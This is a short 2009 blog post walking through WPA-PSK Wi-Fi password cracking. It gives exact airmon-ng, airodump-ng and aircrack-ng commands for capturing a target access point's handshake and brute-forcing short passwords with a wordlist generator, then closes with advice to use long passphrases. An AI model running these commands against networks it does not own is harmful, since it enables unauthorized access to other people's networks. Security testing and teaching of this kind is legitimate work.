Start airmon-ng on channel 6
sudo airmon-ng start wlan0 6
Target the mac of a specific access point until the handshake of the mac shows up at the top, right of the output signifying it captured a handshake.
sudo airodump-ng -c 6 --bssid 00:00:00:A0:32:14 -w psk wlan0
If you grabbed a huge capture, figure out how to split it with wireshark. Test all simple passwords 1 to 8 characters long. John the Ripper is also a possibility for piping passwords to aircrack-ng.
perl ./wg.pl -l 1 -u 8 -v abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng -e linksys -w - psk-01.cap
The best passwords make use of the full 63 character limit with WPA2 + AES (given today's possible options). That'll generate enough possible permutations that'll make your average calculator read "Error" just showing you how many possibilities there are. Even if you only use the same 5 characters to make a 63 character string, that's still a crazy hard password.
| Attachment | Size |
|---|
| wg.pl | 5.26 KB |
Submitted by deekayen on Tue, 12/08/2009 - 1:44am
